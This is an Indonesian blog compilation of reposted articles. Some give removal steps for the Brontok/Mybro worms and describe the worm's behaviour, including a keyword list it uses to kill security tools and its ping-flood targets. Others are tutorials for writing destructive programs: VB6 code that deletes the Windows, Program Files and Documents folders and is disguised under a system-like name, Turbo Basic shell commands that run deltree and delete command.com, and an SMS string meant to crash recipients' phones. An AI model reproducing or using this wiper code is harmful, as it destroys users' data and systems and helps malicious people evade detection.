Senin, 29 Maret 2010

Cara menghapus virus W32/Mybro

Cara menghapus virus W32/Mybro

1. Jika menggunakan windows XP Matikan [System Restore] untuk sementara selama proses pembersihan
2. Sebaiknya lakukan pembersihan melalui “safe mode”
3. Matikan proses dari virus W32/mybro, Anda dapat menggunakan tools pengganti Task manager seperti [Security task manager], tools tersebut dapat didownload di website http://www.neuber.com/taskmanager/ matikan proses berikut [ingat !! cari file yang mempunyai bentuk folder].

o Winlogon

o Services

o Lsass

o Smss

o Csrss

4. Hapus registry yang pernah dibuat oleh W32/Mybro, copy script berikut di notepad kemudian simpan menjadi repair.inf, jalankan file tersebut

o Klik kanan repair.inf

o Klik [install]

[Version]

Signature="$Chicago$"

Provider=Vaksincom



[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del



[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"reg edit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""% 1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"



[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer,NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableTaskMgr

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer\run

HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus-3444Admc

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus-2733VIRM

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer,ShowSuperHidden

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer\run

5. Hapus file Empty.pif pada direktori

o C:\Documents and Settings\suport\Start Menu\Programs\Startup

6. Hapus file yang pernah dibuat oleh virus, sebelumnya pastikan anda telah menampilkan semua file yang disembunyikan, jika folder option belum muncul juga coba restart komputer terlebih dahulu kemudian booting ke mode “safe mode”, setelah itu hapus file berikut:

o

C:\Windows
+

_default17832
+

Cinderawasih-4178327
+

Komodo-6178322
o

C:\Windows\Ad22098
+

Smss.exe
o

C:\Windows\System32\S8787
+

Csrss.exe
+

Lsass.exe
+

Services.exe
+

Winlogon.exe
+

Smss.exe
+

Zh592115084y.exe
+

C.bron.tok.txt, berisi text

Brontok.C

By:Jowobot

+

Spread.mail.bro, berisi alamat email yang telah diperoleh dari komputer yang terinfeksi
+

Spread.sent.Bro, berisi alamat email yang berhasil dikirimkan
o

C:\Documents and Settings\%user%\Local Settings\Application Data
+

Jalak-932115015-bali.com
+

Winlogon.exe [berbentuk notepad]
o

Dv6211500x, berisi file:
+

Yesbron.com
o

C:\Windows\system32
+

C_17832k.com
o

C:\Documents and Settings\suport\Start Menu\Programs\Startup
+

Empty.pif
o

C:\
+

Baca Bro !!!.txt

Anda harus perhatikan juga ukuran file yang terinfeksi tersebut, karena jika file yang terinfeksi [file induk] mempunyai ukuran 51 KB W32/Mybro selain membuat file induk diatas juga akan membuat beberapa file induk tambahan diantaranya:

*

C:\Windows\System32\n8127
o

Csrss.exe
o

Lsass.exe
o

Services.exe
o

Winlogon.exe
o

C.Bron.Tok.txt
o

Spread.mail.bro
o

Spread.sent.bro
o

Sv711917030r.exe
o

Smss.exe
*

C:\Windows\SY20118
o

Smss.exe
7. Hapus file [task scheduled] yang dibuat oleh W32/Mybro
*

Klik [start]
*

Klik [Settings]
*

Klik [control panel]
*

Klik 2 kali menu [Scheduled task]
*

Hapus file AT1 dan AT2
8. Hapus string [daftar website yang diblok] yang dibuat oleh W32/Mybro pada file HOST yang berada dilokasi

C:\Windows\System32\Drivers\ETC

9. Ubah kembali file MSVBVM60.dll.xxx [dimana xxx menunjukan angka] menjadi nama file MSVBVM60.dll pada direktori C:\Windows\system32
10. Coba cari dan hapus file duplikat yang dibuat oleh virus, dengan ciri-ciri

· Ukuran 48 KB atau 51 KB

· Icin yang digunakan berbentuk FOLDER

· Ekstensi file EXE

· Type file “Application”

Catatan:

Dari hasil pengujian virus ini tidak membuat file duplikat pada local disk

11. Untuk pembersihan optimal dan mencegah infeksi ulang, gunakan antivirus yang sudah dapat mengenali virus ini dengan baik. (AJT)
__________________
[url=http://www.blogawards2006.com][img]http://www.geocities.com/avril_gungry/blog.jpg[/img][/url]
[img]http://img6.cdn.adjuggler.com/images/Client286240/1224748912288_20081023160152_forum.gif[/img]

sumber : http://clubbing.kapanlagi.com/showthread.php?s=bf7e61ed0a758355a27f3252f63a9805&t=6330

CARA MEMBUAT VIRUS MEMATIKAN DAN SIMPLE

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.
Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

gampangkan

sumber : http://bangajie.multiply.com/journal/item/19/CARA_MEMBUAT_BUAT_VIRUS_MEMATIKAN_

25 Cara membuat program perusak (Seperti Virus)

Penulis peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis juga
peduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammer
pada langsung lompat ke Pascal, C dan lainnya).

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,
tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,
anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara
membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan
bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.

Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.

sumber : http://rizalsaputra81.blogspot.com/2009/10/cara-membuat-program-perusak-seperti.html

CARA MEMBUAT VIRUS HANDPHONE DENGAN SMS


Hari ini saya akan menjelaskan kepada anda cara membuat VIRUS untuk handphone/hp, bukan VIRUS TROJAN, WAlLWARE. kenapa VIRUS yang saya buat bukan untuk komputer / PC Melainkan untuk handphone? sebelumnya di tahun 2008 saya sudah pernah menjelaskan tentang cara membuat VIRUS TROJAN pastinya program ini di gunakan untuk merusak sistem di suatu komputer tertentu yang mungkin orangnya tidak anda sukai!
Nah ... Sekarang saya akan membagikan ilmu tentang cara membuat VIRUS untuk Hp, sebelumnya pernahkah anda mendapat SMS ketika anda membuka SMS tersebut dan menekan arah bawah maka handphone anda akan secara otomatis akan mati, namun VIRUS ini tidak berbahaya, silahkan copy code virus ini dan kirim ke handphone anda melalui sistem pengiriman SMS melalui internet, seperti yahoo, dll, sebenarnya di blog saya dulu ada sistem pengiriman pesan melalui internet ke Hp tetapi sudah saya hapus, karena saya tidak ingin program ini di pakai untuk menipu! Silahkan copy code di bawah, ini type SMS yang harus anda kirim, kata-kata yang di atas bisa di ubah, tetapi jangan hapus code dan tanda enternya!
Silahkan copy dari bawah sini!


JANGAN TEKAN ARAH BAWAH, INI BUKAN SMS BIASA











_¯_¯_¯_¯ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_0



Nah ingat, virus ini hanya mematikan handphone teman yang di kirimi anda sms, sebenarnya program ini bisa disebut Virus tetapi saya lebih senang menyebutnya program meNON AKTIFKAN handphone tanpa menekan tombol tunoff pada hp!
Cara mengaktifkan hp kembali, anda hanya perlu mengaktifkanya kembali, tetapi virus ini hanya aktif pada handphone yang tidak memiliki pasilitas HSDP, HSDPA, yang tentunya pada hp yang tidak ada antivirusnya, minimal handphone yang gak ada cameranya,
Nah silahkan mencoba!

sumber : http://rizalsaputra81.blogspot.com/2009/10/cara-membuat-virus-untuk-hp-lewat-sms.html

CARA MEMBUAT VIRUS HANDPHONE

cara membuat virus handphone

semaleman gw surfing dan hasilnya banyak yg tidak memuaskan hati gw gw sudah meminta bantuan mbah google tapi tetap nihil gw surfing diinternet dengan keyword cara membuat virus hndphone tetapi yang gw dapet tidak seperti yang gw harapkan banyak yang mengulas tentang virus kebanyakan virus komputer baik itu untuk membasminya atau untuk membuat virusnya tetapi tidak ada cara membuat virus handphone tapi gw tidak menyerah


kenapa gw mencari cara membuat virus handphone karena pada sore harinya handphone gw nokia 6630 yang biasa gw gunakan untuk koneksi internet dengan telkomsel unlimited itu terkena virus handphone ,virus handphone itu namanya baselo yg baru gw ketahui setelah gw searching dengan bantuan mbah google ,pada awalnya gw tidak percaya dengan virus handphone karena menurut gw mana mungkin handphone dapat terinfeksi oleh virus ternyata gw salah ,handphone bisa terinfeksi oleh virus dan itu gw alami sendiri .
bagaimana HP nokia 6630 gw terkena virus begini awal ceritanya pada sekitar jam 6:30 sore gw sedang asik konek ke internet dengan HP kesayangan gw yang gw jadikan modem dengan media bluetooh sebagai koneksi ke handphonenya selang beberapa saat di layar HP gw ada tulisan "terima file dari cahaya (ya/cancel)" gw bingung ada yg berusaha kirim file ke HP gw melalui bluetooth dengan nama device cahaya dan nama file yg dikirim "love.rm",beberapa kali gw cancel informasi tersebut bodohnya gw entah yang ke beberapa kali tulisan itu timbul
dan gw menekan tombol "ya" dan selanjutnya ada perintah instal dan lagi-lagi gw tekan "ya" setelah itu otomatis instalasi jalan setelah selesai beberapa saat tidak terjadi apa-apa ,lalu tiba-tiba koneksi internet gw terputus gw bingung "apa yg terjadi" ,setelah gw lihat indikator bluetooth di HP gw sepertinya HP gw sedang ada aktivasi "discover device" melalui bluetooth sedangkan gw sendiri bingung padahal gw tidak melakukan apa-apa,gw curiga dengan file yang tadi gw install gw coba konek lagi ke internet dengan koneksi bluetooth lagi2 gw gagal, akhirnya gw putuskan koneksi menggunakan kabel data allhamdulillah koneksi berhasil ,setelah beberapa saat koneksi
mati gw liat ke layar HP gw liat ada indikator pesan yg sedang di kirim dan mengakses jalur koneksi mms,lalu gw ke kotak pesan dan ke kotak keluar ternyata ada pesan yg akan dikirim keluar dengan nama ile berupa angka dengan sembilan digit dengan attacthment file berekstension gambar gw maik curiga klo file yg terinstall tadi adalah virus akhirnya gw hapus koneksi MMS gw dan gw coba konek menggunakan kabel data dan mencari informasi tentang file yg gw terima dan gw install.
ternyata gw sangat terkejut file yg gw terima dan gw install ternyata adalah virus HP yang bernama baselo akhirnya gw surfing untuk mencari cara menghilangkan virus tersebut dan gw temui caranya.
cara untuk menghilangkan virus itu ternyata tidak gampang tapi allhamdulillah setelah gw ikuti langkah-langkahnya virus itu bisa hilang dn gw bisa koneksi ke internet lagi dengan handphone menggunakan telkomsel-flash unlimited lagi dengan konsekuensi yg harus gw terima karena menerima kiriman dan instalasi file yang kagak jelas dari mana konsekuensinya nomor2 yg tersimpan di memory HP dan aplikasi yg terinstal di memory HP hilang semua karena
langkah2 untuk menghilangkan virus baselo dengan mereset setingan HP kita.
Ok kawan-kawan itulah pengalaman gw dengan virus handphone semoga hal ini tidak dialami kalian ,ok sampai disini dulu lanjut ke postingan terbaru lainnya di kesempatan mendatang.

sumber :http://www.belajar-bareng.co.cc/2008/08/cara-membuat-virus-handphone.html

Minggu, 28 Maret 2010

CARA MEMBASMI VIRUS BRONTOK

a. Restart komputer dan masuk dalam mode "safe mode with command prompt", dengan cara menekan tombol [F8] ketika komputer restart, hal ini dimaksudkan agar virus Rontokbro tidak aktif pada posisi "safe mode" dan komputer tidak melakukan restart selama proses pembersihan.

b. Setelah masuk mode "Command Prompt" tekan tombol [CTRL] + [ALT] + [Del] secara bersamaan, kemudian pilih [Task Manager], setelah layar Task Manager muncul, klik menu [File] pilih [New Task (Run..), kemudian ketik [explorer] pada jendela [create new task file] setelah itu klik enter.

c. Kemudian akan muncul layar desktop (layaknya masuk ke mode "safe mode")

d. Aktifkan kembali fungsi registry editor dan hapus string yang dibuat oleh virus, tulis script seperti yang ada pada angka [3], kemudian simpan menjadi nama file "repair.inf", setelah itu jalankan file tersebut dengan cara: klik kanan file [repair.inf] kemudiani pilih [install]

e. Hapus option [Smss], [Empty] dan [Sempalong] pada msconfig ditabulasi [startup)

f. Agar "Folder option" pada windows explorer dapat muncul, restart kembali komputer dan lakukan seperti langkah pada point (a dan b)

g. Setelah komputer masuk ke mode "safe mode" tampilkan semua file yang disembunyikan (lakukan perubahan ini pada "folder option", lihat point [5], selanjutnya ikuti petunjuk pembersihan Rontokbro seperti yang ada pada point (6-9)


3. Tulis script berikut dan simpan di notepade beri nama file repair.inf, jalankan file tersebut (klik kanan [repair.inf] pilih [install]), hal ini dimaksudkan untuk mengaktifkan kembali fungsi registry editor, menampilkan kembali [folder option] serta menghapus string yang telah dibuat oleh virus:

[Version]
Signature="$Chicago$"
Provider=Vaksincom

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,"Explorer.exe"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus

4. Restart komputer dan masuk kembali ke mode "safe mode" jangan ke posisi "normal" karena file induk dari virus ini masih ada (eksplorasi.exe dan sempalong.exe)

5. Tampilkan file yang disembunyikan, lakukan perubahan pada [folder Option]

6. Hapus file yang dibuat oleh Rontokbro
- C:\Windows dengan, nama file eksplorasi.exe (hidden)
- C:\windows\shellnew, dengan nama sempalong.exe(hidden)
- C:\WINDOWS\system32, dengan nama %username"s Setting.scr (hidden)
- C:\Windows\pss, dengan nama file [Empty.pifStartup]
- C:\Documents and Settings\%user%\Local Settings\Application Data dengan nama file:
- Bron.tok-[x]-[y], di mana [X] dan [Y] menunjukan angka
-- Loc.Mail.Bron.Tok
-- Ok-SendMail-Bron-tok
-- csrss.exe
-- inetinfo.exe
-- Kosong.Bron.Tok.txt
-- lsass.exe
-- NetMailTmp.bin
-- services.exe
-- smss.exe
-- Update.3.Bron.Tok.bin
-- winlogon.exe
-- smss.exe

7. Edit kembali file autoexec.bat di direktori C:\ dan hapus baris perintah [pause]

8. Hapus scheduled tasks yang dibuat oleh Rontokbro (klik [Start], [Settings], [Control Panel], kemudian klik 2 kali menu [scheduled tasks].

9. Hapus file yang dibuat oleh virus, untuk lebih cepatnya gunakan fasilitas [search]

- Klik [Start]
- Klik [Search], kemudian klik [For Files or Folders]
- Kemudian pilih [All files or Folders]
- Klik option [What size is it ?]
- Kemudian pilih option [Specify Size (in Kb)]
- Pada kombo Box, pilih [At most] kemdian isi ukuran file dengan angka [43], setelah itu klik [Search]
- Setelah proses pencarian selesai, sortir berdasarkan ukuran (size), kemudian hapus file yang mempunyai ukuran 42 kb, jangan sampai terjadi kesalahan dalam penghapusan file karena ada beberapa file windows yang mempunyai ukuran 42 kb, cari file yang icon folder dengan extension. EXE.

10. Untuk pembersihan lebih cepat sebaiknya Anda gunakan antivirus yang sudah dapat mengenali Rontokbro.N jangan lupa update antiviru yang terinstall, sebagai informasi antivirus Norman dengan up-date terakhir sudah dapat menganali virus ini dengan baik.

sumber : http://www.ketok.com/forum/viewtopic.php?p=58

KOMPUTER RESTART TERUS MENERUS

Bagaimana kita bisa mengetahui bahwa komputer sudah terinfeksi Rontokbro ? Selain melakukan beberapa perubahan pada registri yang mengakibatkan pemblokiran pada akses Registry Editor sehingga anda tidak bisa membuka regedit.exe, Rontokbro juga menyebabkan komputer restart terus menerus. Biang keladinya bukan eksploitasi celah keamanan seperti Sasser, melainkan karena Rontokbro melakukan restart pada komputer setiap kali menemukan aplikasi dengan nama :

..
.@
@.
.ASP
.EXE
.HTM
.JS
.PHP
ADMIN
ADOBE
AHNLAB
ALADDIN
ALERT
ALWIL
ANTIGEN
APACHE
APPLICATION
ARCHIEVE
ASDF
ASSOCIATE
AVAST
AVG
AVIRA
BILLING@
BLACK
BLAH
BLEEP
BUILDER
CANON
CENTER
CILLIN
CISCO
CMD.
CNET
COMMAND
COMMAND PROMPT
CONTOH
CONTROL
CRACK
DARK
DATA
DATABASE
DEMO
DETIK
DEVELOP
DOMAIN
DOWNLOAD
ESAFE
ESAVE
ESCAN
EXAMPLE
FEEDBACK
FIREWALL
FOO@
FUCK
FUJITSU
GATEWAY
GOOGLE
GRISOFT
GROUP
HACK
HAURI
HIDDEN
HP.
IBM.
INFO@
INTEL.
KOMPUTER
LINUX
LOG OFF WINDOWS
LOTUS
MACRO
MALWARE
MASTER
MCAFEE
MICRO
MICROSOFT
MOZILLA
MYSQL
NETSCAPE
NETWORK
NEWS
NOD32
NOKIA
NORMAN
NORTON
NOVELL
NVIDIA
OPERA
OVERTURE
PANDA
PATCH
POSTGRE
PROGRAM
PROLAND
PROMPT
PROTECT
PROXY
RECIPIENT
REGISTRY
RELAY
RESPONSE
ROBOT
SCAN
SCRIPT HOST
SEARCH R
SECURE
SECURITY
SEKUR
SENIOR
SERVER
SERVICE
SHUT DOWN
SIEMENS
SMTP
SOFT
SOME
SOPHOS
SOURCE
SPAM
SPERSKY
SUN.
SUPPORT
SYBARI
SYMANTEC
SYSTEM CONFIGURATION
TEST
TREND
TRUST
UPDATE
UTILITY
VAKSIN
VIRUS
W3.
WINDOWS SECURITY.VBS
WWW
XEROX
XXX
YOUR
ZDNET
ZEND
ZOMBIE

dimana tujuan dari aksi ini adalah jelas untuk memproteksi dirinya supaya tidak mudah dibasmi.

Selain itu Rontokbro juga berusaha menyerang website

israel.gov.il
playboy.com

dengan cara membanjiri dengan ping. Namun dampak dari aktivitas ini hanya akan terasa kalau komputer yang terinfeksi mencapai jumlah yang sangat banyak (e.g. 10.0000 komputer) yang pada kasus tertentu dapat mengakibatkan website yang diserang menjadi lumpuh /down.

sumber : http://www.ketok.com/forum/viewtopic.php?p=58